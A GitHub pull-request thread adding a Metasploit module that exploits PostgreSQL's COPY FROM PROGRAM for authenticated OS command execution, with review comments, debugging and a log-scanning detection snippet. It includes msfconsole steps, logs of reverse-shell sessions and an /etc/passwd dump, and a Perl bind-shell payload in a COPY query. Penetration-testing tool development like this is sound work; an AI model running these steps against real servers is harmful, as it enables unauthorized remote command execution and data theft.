Adding new Postgres_cmd_execution module #11598

Merged
merged 41 commits into from May 7, 2019

5 participants
@Greenwolf
Contributor

commented Mar 20, 2019

PostgreSQL from 9.3 to latest has functionality allowing the database superuser & users in the 'pg_execute_server_program' group to execute OS commands.

Explanation:
https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5

This is my first run through of a Metasploit module so I would appreciate anyone helping me clean it up. It currently works on OSX & Linux by providing a cmd stager (like cmd/unix/reverse_perl), and on Windows by first starting up a PowerShell download cradle, then putting the command in the COMMAND parameter. It feels a little hacky though 😁

List the steps needed to make sure this thing works

  • Start msfconsole
  • use exploit/multi/postgres/postgres_cmd_execution_nine_three
  • set RHOST target.ip.add.ress
  • set payload cmd/unix/reverse_perl
  • set PASSWORD postgres
  • set USERNAME postgres
  • set DATABASE postgres
  • set LHOST my.ip.add.ress
  • set LHOST myport
  • exploit
Adding new Postgres_cmd_execution module
PostgreSQL from 9.3 to latest has functionality allowing the database superuser & users in the 'pg_read_server_files' group to execute OS commands. 

Explanation:
https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5

This is my first run through of a Metasploit module so I would appreciate anyone helping me clean it up. It currently works on OSX & Linux by providing a cmd stager (like cmd/unix/reverse_perl), and on Windows by first starting up a PowerShell download cradle, then putting the command in the COMMAND parameter. It feels a little hacky though 😁
@bcoles

Contributor

commented Mar 21, 2019

Please run ./tools/dev/msftidy.rb modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb on this module and resolve the following issues:

[*] Running msftidy.rb in ./.git/hooks/post-merge mode
--- Checking new and changed module syntax with tools/dev/msftidy.rb ---
modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb - [INFO] No CVE references found. Please check before you land!
modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb - [ERROR] '>' is a bad character in module title.
modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb:19 - [WARNING] Spaces at EOL
modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb:20 - [WARNING] Spaces at EOL
modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb:23 - [WARNING] Spaces at EOL
modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb:26 - [WARNING] Spaces at EOL
modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb:30 - [WARNING] Spaces at EOL
modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb:65 - [WARNING] Please use snake case on method names: def tablename; datastore['TABLENAME']; end 
modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb:69 - [WARNING] Please use snake case on method names: def command; datastore['COMMAND']; end 
modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb:100 - [WARNING] Spaces at EOL
modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb:104 - [WARNING] Spaces at EOL
modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb:126 - [WARNING] Spaces at EOL
modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb:144 - [WARNING] Spaces at EOL
modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb - [WARNING] Please add a newline at the end of the file
------------------------------------------------------------------------
@bcoles

Contributor

commented Mar 21, 2019

Please add some module documentation for this module.

bcoles and others added some commits Mar 21, 2019

Update modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb

Co-Authored-By: Greenwolf <48361984+Greenwolf@users.noreply.github.com>
@Greenwolf

Contributor Author

commented Mar 21, 2019

Hi @bcoles, thank you for all your tips and advice, I've implemented all the fixes you requested to the code in my branch. I'm having an issue with this last tidy option though:

$ ./tools/dev/msftidy.rb ~/Desktop/postgres-cmd-execution/post_gres_bcole_fixes.rb
~/Desktop/postgres-cmd-execution/post_gres_bcole_fixes.rb - [WARNING] Unexpected and potentially incorrect super class found ('Msf::Exploit::Remote')

Do you know why it would be saying it's a potentially incorrect super class?

I'll just work on that documentation now.

Greenwolf added some commits Mar 21, 2019

@bcoles

Contributor

commented Mar 21, 2019

Do you know why it would be saying it's a potentially incorrect super class?

msftidy is confused because the module path ~/Desktop/postgres-cmd-execution/post_gres_bcole_fixes.rb is located outside of the framework.

@module_type is defined based on the path:

@module_type = File.dirname(File.expand_path(@full_filepath))[/\/modules\/([^\/]+)/, 1]

Later:

    if prefix_super_map.key?(@module_type)
      unless super_class =~ prefix_super_map[@module_type]
        error("Invalid super class for #{@module_type} module (found '#{super_class}', expected something like #{prefix_super_map[@module_type]}")
      end
    else
      warn("Unexpected and potentially incorrect super class found ('#{super_class}')")
    end
@Greenwolf

Contributor Author

commented Mar 21, 2019

Ah ok, so I guess that one isn't an issue once it's merged in. I've also created the documentation you requested. Let me know if you need anything else?

@bcoles

Contributor

commented Mar 21, 2019

The module name should describe the vulnerable functionality. I haven't read your blog post yet (nor this PR code), but presumably something like PostgreSQL pg_read_server_files Command Execution would be suitable. You might be able to come up with something better.

The module file name should match the module name, ie postgres_pg_read_server_files_cmd_exec.

@bcoles

Contributor

commented Mar 21, 2019

Ah ok, so I guess that one isn't an issue once it's merged in.

msftidy is run as part of the automated Travis CI tests. It won't be confused, because the file is located at the correct path.

@Greenwolf

Contributor Author

commented Mar 21, 2019

Well, it's anyone in the pg_read_server_files group + superusers, I think superusers will be more common though. The flaw is that Postgres has a COPY TO/FROM PROGRAM function, similar to xp_cmdshell, so I'll do something around that

@Greenwolf

Contributor Author

commented Mar 21, 2019

How about:
postgres_copy_from_program_cmd_exec

Greenwolf added some commits Mar 21, 2019

@Greenwolf

Contributor Author

commented Mar 21, 2019

I also added you to authors for your assistance:
'bcoles' # metasploit module assistance

Greenwolf added some commits Mar 21, 2019

@bcoles

Contributor

commented Mar 21, 2019

I also added you to authors for your assistance:
'bcoles' # metasploit module assistance

Thanks, but please remove. I haven't done anything.

Also, I probably won't have time to review, test and land this PR. Someone else will take over.

@Greenwolf

Contributor Author

commented Mar 21, 2019

Done, does everything look good so far though? I applied all your changes. Not sure why the travis-ci continuous integration is failing though.

Update modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb

Co-Authored-By: Greenwolf <48361984+Greenwolf@users.noreply.github.com>
@bcoles

Contributor

commented Apr 12, 2019

I still haven't tested this module. Leaving it for @wvu-r7

My only remaining observation is that print_error "#{peer} - Unknown" is used half a dozen times, but offers no insight into what went wrong. There's also not much in the way of print messages, making diagnosing what went wrong almost impossible without manually modifying the module, as the user is provided only Unknown.

For example, a failed exploit would return trying exploit; error unknown; exploit failed as the only feedback to the user regardless of where the exploitation failed. This is problematic for debugging purposes.

A more detailed error message in each instance would be nice.

@wvu-r7

Contributor

commented Apr 12, 2019

I last tested this exploit and found the latest commit did not work. The original commit worked if I fixed the syntax error within. See #11598 (comment). I haven't had time to debug further yet.

@bcoles bcoles dismissed their stale review Apr 13, 2019

msftidy issues resolved

@Greenwolf

Contributor Author

commented Apr 15, 2019

@wvu-r7 I'm having problems with my metasploit install breaking so I haven't been able to get to this. Could either of you please advise which line to change? I'm a bit confused by the previous linked comment.

@Greenwolf

Contributor Author

commented Apr 15, 2019

Appears to be working for me

msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > show options

Module options (exploit/multi/postgres/postgres_copy_from_program_cmd_exec):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   DATABASE           postgres         yes       The database to authenticate against
   DUMP_TABLE_OUTPUT  false            no        select payload command output from table (For Debugging)
   PASSWORD           postgres         no        The password for the specified username. Leave blank for a random password.
   RHOSTS             192.168.0.25     yes       The target address range or CIDR identifier
   RPORT              5432             yes       The target port (TCP)
   TABLENAME          iSpvelJiCi       yes       A table name that does not exist (To avoid deletion)
   USERNAME           postgres         yes       The username to authenticate as


Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.0.27     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set RHOSTS 192.168.0.29
RHOSTS => 192.168.0.29
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > exploit

[*] Started reverse TCP handler on 192.168.0.27:4444 
[*] 192.168.0.29:5432 - 192.168.0.29:5432 - PostgreSQL 10.7 (Ubuntu 10.7-1.pgdg18.04+1) on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 7.3.0-27ubuntu1~18.04) 7.3.0, 64-bit
[*] 192.168.0.29:5432 - Exploiting...
[+] 192.168.0.29:5432 - 192.168.0.29:5432 - iSpvelJiCi dropped successfully
[+] 192.168.0.29:5432 - 192.168.0.29:5432 - iSpvelJiCi created successfully
[+] 192.168.0.29:5432 - 192.168.0.29:5432 - iSpvelJiCi copied successfully(valid syntax/command)
[+] 192.168.0.29:5432 - 192.168.0.29:5432 - iSpvelJiCi dropped successfully(Cleaned)
[*] 192.168.0.29:5432 - Exploit Succeeded
[*] Command shell session 1 opened (192.168.0.27:4444 -> 192.168.0.29:55890) at 2019-04-15 22:04:50 +0100

whoami
postgres
^C
Abort session 1? [y/N]  y
""

[*] 192.168.0.29 - Command shell session 1 closed.  Reason: User exit

@wvu-r7

Contributor

commented Apr 15, 2019

@Greenwolf: Can you test against https://github.com/vulhub/vulhub/tree/master/postgres/CVE-2019-9193 with this PR merged against upstream/master?

I do the following:

git fetch --all
git checkout upstream/master
git merge --no-ff --no-edit upstream/pr/11598
bundle install

In your case, you can supply your own branch in place of the PR branch.

@wvu-r7 wvu-r7 dismissed their stale review Apr 15, 2019

DUMP_TABLE_OUTPUT implemented.

@Greenwolf

Contributor Author

commented Apr 16, 2019

Hi @wvu-r7, I can't seem to checkout? I'm probably not doing it correctly:

$ git clone https://github.com/rapid7/metasploit-framework
Cloning into 'metasploit-framework'...
remote: Enumerating objects: 18, done.
remote: Counting objects: 100% (18/18), done.
remote: Compressing objects: 100% (18/18), done.
remote: Total 491869 (delta 6), reused 6 (delta 0), pack-reused 491851
Receiving objects: 100% (491869/491869), 386.05 MiB | 850.00 KiB/s, done.
Resolving deltas: 100% (360420/360420), done.
Checking out files: 100% (9723/9723), done.
$ cd metasploit-framework/
$ git fetch --all
Fetching origin
$ git checkout upstream/master
error: pathspec 'upstream/master' did not match any file(s) known to git
@wvu-r7

Contributor

commented Apr 16, 2019

If you cloned from https://github.com/rapid7/metasploit-framework, origin is upstream. You should work off your fork. Are you using the command line or the web UI?

@Greenwolf

Contributor Author

commented Apr 16, 2019

I've done it from the web UI so far; forking, new files, edits

@wvu-r7

Contributor

commented Apr 16, 2019

Add more commits by pushing to the postgres_cmd_execution_nine_three branch on Greenwolf/metasploit-framework.

Hmm, I have an idea to short-circuit my suggestion.

@wvu-r7

Contributor

commented Apr 16, 2019

wvu@kharak:/rapid7/metasploit-framework:HEAD$ git push-remote Greenwolf postgres_cmd_execution_nine_three
Counting objects: 2552, done.
Delta compression using up to 4 threads.
Compressing objects: 100% (929/929), done.
Writing objects: 100% (2552/2552), 551.34 KiB | 6.72 MiB/s, done.
Total 2552 (delta 2021), reused 2095 (delta 1608)
remote: Resolving deltas: 100% (2021/2021), completed with 222 local objects.
To wvu-r7.github.com:Greenwolf/metasploit-framework
   6f92b98ba2..c03ee656a3  HEAD -> postgres_cmd_execution_nine_three
wvu@kharak:/rapid7/metasploit-framework:HEAD$

Hax.

@wvu-r7

Contributor

commented Apr 16, 2019

Try testing this branch again, please. Are you using https://github.com/vulhub/vulhub/tree/master/postgres/CVE-2019-9193 ?

@Greenwolf

Contributor Author

commented Apr 16, 2019

Unfortunately I'm still having problems:

$ git push-remote Greenwolf postgres_cmd_execution_nine_three
git: 'push-remote' is not a git command. See 'git --help'.

Also no, I'm testing it against an Ubuntu 18.04 VM which I installed PostgreSQL 10.7 on and enabled remote access.

@bcoles

Contributor

commented Apr 17, 2019

Unfortunately I'm still having problems:

$ git push-remote Greenwolf postgres_cmd_execution_nine_three
git: 'push-remote' is not a git command. See 'git --help'.

Also no, I'm testing it against an Ubuntu 18.04 VM which I installed PostgreSQL 10.7 on and enabled remote access.

That's not going to work on your system. push-remote is a git alias which wvu has defined.

Effectively, wvu is asking you to test this module on the latest version of Metasploit.

If you're not familiar with git, the easiest solution is to make sure your Metasploit is up to date, then just paste the code from this PR into a module and test it.

@wvu-r7

Contributor

commented Apr 17, 2019

Thank you, @bcoles. Apologies for not explaining it. Yes, I would like us to be testing the same environment with the same code.

VulHub's environment is also 10.7, but I'm encountering a Postgres syntax error on table DROP. It may be a library bug, which is why I'm trying to suss it out this way.

And yeah, it works fine if I use the original commit (after adding a comma) or if I use psql directly. Something is amiss about the latest commit or its interaction with the library code.

#11598 (comment)

@Greenwolf

Contributor Author

commented Apr 23, 2019

Good Morning @wvu-r7 & @bcoles, I got round to looking at this. When I use a generic command with it, it works fine on the latest version of metasploit.

msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > show options

Module options (exploit/multi/postgres/postgres_copy_from_program_cmd_exec):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   DATABASE           template1        yes       The database to authenticate against
   DUMP_TABLE_OUTPUT  false            no        select payload command output from table (For Debugging)
   PASSWORD           postgres         no        The password for the specified username. Leave blank for a random password.
   RHOSTS             127.0.0.1        yes       The target address range or CIDR identifier
   RPORT              5432             yes       The target port (TCP)
   TABLENAME          i4pyFlvzBfd      yes       A table name that does not exist (To avoid deletion)
   USERNAME           postgres         yes       The username to authenticate as


Payload options (cmd/windows/generic):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------
   CMD   cat /etc/passwd  yes       The command string to execute


Exploit target:

   Id  Name
   --  ----
   3   Windows (CMD)


msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set DUMP_TABLE_OUTPUT true
DUMP_TABLE_OUTPUT => true
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > exploit

[*] 127.0.0.1:5432 - 127.0.0.1:5432 - PostgreSQL 10.7 (Debian 10.7-1.pgdg90+1) on x86_64-pc-linux-gnu, compiled by gcc (Debian 6.3.0-18+deb9u1) 6.3.0 20170516, 64-bit
[*] 127.0.0.1:5432 - Exploiting...
[+] 127.0.0.1:5432 - 127.0.0.1:5432 - i4pyFlvzBfd dropped successfully
[+] 127.0.0.1:5432 - 127.0.0.1:5432 - i4pyFlvzBfd created successfully
[+] 127.0.0.1:5432 - 127.0.0.1:5432 - i4pyFlvzBfd copied successfully(valid syntax/command)
[+] 127.0.0.1:5432 - 127.0.0.1:5432 - i4pyFlvzBfd contents:
{:complete=>#<Msf::Db::PostgresPR::Connection::Result:0x00007fd837695408 @rows=[["root:x:0:0:root:/root:/bin/bash"], ["daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin"], ["bin:x:2:2:bin:/bin:/usr/sbin/nologin"], ["sys:x:3:3:sys:/dev:/usr/sbin/nologin"], ["sync:x:4:65534:sync:/bin:/bin/sync"], ["games:x:5:60:games:/usr/games:/usr/sbin/nologin"], ["man:x:6:12:man:/var/cache/man:/usr/sbin/nologin"], ["lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin"], ["mail:x:8:8:mail:/var/mail:/usr/sbin/nologin"], ["news:x:9:9:news:/var/spool/news:/usr/sbin/nologin"], ["uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin"], ["proxy:x:13:13:proxy:/bin:/usr/sbin/nologin"], ["www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin"], ["backup:x:34:34:backup:/var/backups:/usr/sbin/nologin"], ["list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin"], ["irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin"], ["gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin"], ["nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin"], ["_apt:x:100:65534::/nonexistent:/bin/false"], ["postgres:x:999:999::/var/lib/postgresql:/bin/bash"], ["Debian-exim:x:101:101::/var/spool/exim4:/bin/false"]], @fields=[#<struct Msf::Db::PostgresPR::RowDescription::FieldInfo name="filename", oid=16396, attr_nr=1, type_oid=25, typlen=-1, atttypmod=-1, formatcode=0>], @cmd_tag="SELECT 21">}
[*] 127.0.0.1:5432 - Exploit Succeeded
[*] Exploit completed, but no session was created.

However, when I try to use a reverse or bind shell, I run into issues like this:

[!] 127.0.0.1:5432 - 127.0.0.1:5432 - Unable to execute query: COPY i4pyFlvzBfd FROM PROGRAM 'perl -MIO -e ''$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};''';

I've verified once again however that it does work on an Ubuntu 18.04 install with Postgres 10.7. If you wish to confirm you'll need to set a password for the postgres user, and allow remote authentication.
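
The failing query in the comment above shows the statement shape the module sends: `COPY <table> FROM PROGRAM '<command>'`, with single quotes inside the command doubled. A defender-side check for that shape in PostgreSQL statement logs follows, as an added example that is not part of the PR or the module. The log lines and the names `find_copy_program` and `scan_log` are constructed for illustration, and it assumes statement logging is enabled so each query appears after `statement:`.

```ruby
# Added example: flag COPY ... FROM/TO PROGRAM statements in PostgreSQL logs.
# Assumption: statement logging is enabled, so queries follow "statement: ".

# Heuristic match on the statement text (not a full SQL parser).
COPY_PROGRAM = /\bCOPY\s+(?<target>.+?)\s+(?<dir>FROM|TO)\s+PROGRAM\b\s*/im

# Decode a single-quoted SQL literal; `start` is the index just past the
# opening quote. A doubled quote ('') is an escaped quote, not the end.
def read_sql_literal(sql, start)
  out = +''
  i = start
  while i < sql.length
    if sql[i] == "'"
      return out unless sql[i + 1] == "'"
      out << "'"
      i += 2
    else
      out << sql[i]
      i += 1
    end
  end
  nil # no closing quote: the log line was truncated
end

# Returns a hash describing the COPY ... PROGRAM statement, or nil.
def find_copy_program(line)
  sql = line[/statement:\s*(.*)\z/m, 1]
  return nil unless sql
  m = COPY_PROGRAM.match(sql)
  return nil unless m
  rest_at = m.end(0)
  # Only plain '...' literals are decoded; dollar-quoted or E'' forms are
  # still reported, with :program left nil for manual review.
  program = sql[rest_at] == "'" ? read_sql_literal(sql, rest_at + 1) : nil
  { target: m[:target], direction: m[:dir].upcase, program: program }
end

# Returns one hash per flagged line, with its 1-based line number.
def scan_log(lines)
  lines.each_with_index.map do |line, idx|
    hit = find_copy_program(line)
    hit && hit.merge(line_no: idx + 1)
  end.compact
end

# Constructed sample log lines (not taken from the PR).
SAMPLE_LOG = [
  "2019-04-23 09:00:01 UTC [311] postgres@template1 LOG:  statement: DROP TABLE IF EXISTS demo_tbl;",
  "2019-04-23 09:00:01 UTC [311] postgres@template1 LOG:  statement: CREATE TABLE demo_tbl(filename text);",
  "2019-04-23 09:00:02 UTC [311] postgres@template1 LOG:  statement: COPY demo_tbl FROM PROGRAM 'echo ''hello''';",
  "2019-04-23 09:00:03 UTC [312] app@shop LOG:  statement: COPY orders FROM '/var/lib/import/orders.csv';",
  "2019-04-23 09:00:04 UTC [313] app@shop LOG:  statement: copy (select 1) to program 'cat > /dev/null';"
].freeze

if __FILE__ == $PROGRAM_NAME
  scan_log(SAMPLE_LOG).each do |h|
    puts "line #{h[:line_no]}: COPY #{h[:direction]} PROGRAM " \
         "#{h[:program].inspect} (target #{h[:target]})"
  end
end
```

An ordinary file-based `COPY ... FROM '/path'` is not flagged; only the `PROGRAM` form, which runs a command as the database server's OS user, is reported.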

@Greenwolf

Contributor Author

commented May 6, 2019

Hey @wvu-r7 & @bcoles, are we all happy for this to be merged?

@wvu-r7

Contributor

commented May 7, 2019

Sorry for the longer-than-usual delay on this. I'm happy enough with the code, and since you've repro'd this on 9.3, I'll trust you!

There are still bugs on Postgres 10.x, but they appear to be library-related and outside the scope of this PR. I'm shipping this as is until someone wants to take a stab at fixing the bugs. Thank you!

I hope the protracted back-and-forth on this PR hasn't deterred you from contributing again. I hope the next time around won't have any esoteric bugs!

@wvu-r7 wvu-r7 merged commit c03ee65 into rapid7:master May 7, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Metasploit Automation - Test Execution Successfully completed all tests.
continuous-integration/travis-ci/pr The Travis CI build passed

wvu-r7 added a commit that referenced this pull request May 7, 2019

msjenkins-r7 added a commit that referenced this pull request May 7, 2019

@wvu-r7

Contributor

commented May 7, 2019

Release Notes

The multi/postgres/postgres_copy_from_program_cmd_exec exploit module has been added to the framework. This module exploits PostgreSQL >= 9.3, given there are known credentials and the pg_execute_server_program default role is enabled for the user.

@Greenwolf

Contributor Author

commented May 7, 2019

Not at all, thank you both for the help and advice on fixing up the module, I learned a lot and I'm looking forward to contributing again 🙂

@ccondon-r7

Contributor

commented May 8, 2019

Nice work, @Greenwolf, and thanks for your patience! We'll see if we can get this module into the next Metasploit demo.

@bcoles

Contributor

commented May 21, 2019

I just noticed that the module prints peer unnecessarily, resulting in duplicated output. Not sure how this was overlooked during review, as the output is also included in the module documentation.

     msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > exploit

    [*] Started reverse TCP handler on 192.168.0.18:4456
    [*] 192.168.0.25:5432 - 192.168.0.25:5432 - PostgreSQL 11.2 (Ubuntu 11.2-1.pgdg18.04+1) on x86_64-pc-linux-g
    [*] 192.168.0.25:5432 - Exploiting...
    [+] 192.168.0.25:5432 - 192.168.0.25:5432 - msftesttable dropped successfully
    [+] 192.168.0.25:5432 - 192.168.0.25:5432 - msftesttable created successfully
    [+] 192.168.0.25:5432 - 192.168.0.25:5432 - msftesttable copied successfully(valid syntax/command)
    [+] 192.168.0.25:5432 - 192.168.0.25:5432 - msftesttable dropped successfully(Cleaned)
    [*] 192.168.0.25:5432 - Exploit Succeeded
    [*] Command shell session 2 opened (192.168.0.18:4456 -> 192.168.0.25:51784) at 2019-03-24 18:07:11 +0000

It seems both the following PostgreSQL modules make excessive use of peer.

  • modules/exploits/multi/postgres/postgres_createlang.rb
  • modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
@wvu-r7

Contributor

commented May 21, 2019

Wow, I missed it in my own testing, too. Death to the peer gods. #6526
